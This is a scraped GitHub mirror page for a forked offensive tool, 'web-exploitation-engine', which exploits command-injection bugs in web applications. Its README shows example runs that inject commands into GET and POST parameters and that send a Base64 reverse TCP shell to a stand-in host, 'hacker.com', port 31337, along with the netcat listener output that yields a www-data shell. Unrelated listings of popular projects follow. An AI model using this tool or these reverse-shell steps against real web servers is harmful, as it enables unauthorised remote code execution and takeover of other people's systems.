exploitcollection / web-exploitation-engine Goto Github PK
View Code? Open in Web Editor NEWThis project forked from infodox/web-exploitation-engine
Generic Command Exploitation Engine for exploiting web application command-injection bugs,.
This project forked from infodox/web-exploitation-engine
Generic Command Exploitation Engine for exploiting web application command-injection bugs,.
Web Exploitation Engine - Generic Command Injection Exploitation Utility. This is a simple enough utility written to exploit command injection bugs in web applications. I had abandoned this project a while ago, then saw the brilliant "rce.py" tool written by @LaNMaSteR53, and saw his elegant solution to the "how to denote where to put the payload" problem, so I shamelessly ripped his code to write this. This tool can either give an inline shell like the original rce.py (it uses the same functions, just rewritten to suit), or a reverse shell. Currently it only supports a Base64 encoded Reverse TCP shell payload, however the magic of the "payloads" module is that you can actually expand it. You just have to do a little work to add more payloads. So, how do I use this. The only mandatory argument is --url='URL HERE'. In the url, using the <rce> tag, you specify where to inject code in the request. For example: h4x# ./we.py --url='http://localhost/test/cmd.php?=<rce>' shell> id [*] Executed: id uid=33(www-data) gid=33(www-data) groups=33(www-data) shell> By default, it assumes a GET request and uses the inline shell mode. To specify a POST request, you pass the params and values just like a GET, except you specify --method=post to tell the parser it is a POST injection. For example: h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post shell> id [*] Executed: id uid=33(www-data) gid=33(www-data) groups=33(www-data) shell> The --shell arguement tells it if you want an inline, or reverse shell. Default operation is the "inline shell" like the original rce.py script. To do a reverse shell, --shell=reverse is needed. You also must specify the host and port to connect to. --lhost and --lport arguments are, by default, 127.0.0.1 and 4444 respectively. So, to get a reverse shell sent to port 31337 on "hacker.com", using the above GET request exploit, we can do the following. h4x# ./we.py --url='http://localhost/test/cmd.php?cmd=<rce>' --shell=reverse --lhost=hacker.com --lport=31337 [+] Doing a reverse shell! [*] LHOST: hacker.com [*] LPORT: 31337 [!] Hope your listener is listening And over at "hacker.com" (localhost on my box for this demo), we get the following: # nc -lvp 31337 listening on [any] 31337 ... connect to [127.0.0.1] from localhost [127.0.0.1] 58794 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ Reverse shell access works rather flawlessly. For now, just the python-reverse payload, however I hope to add a python bindshell soon, along with, perhaps, some Perl payloads for extra fun.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.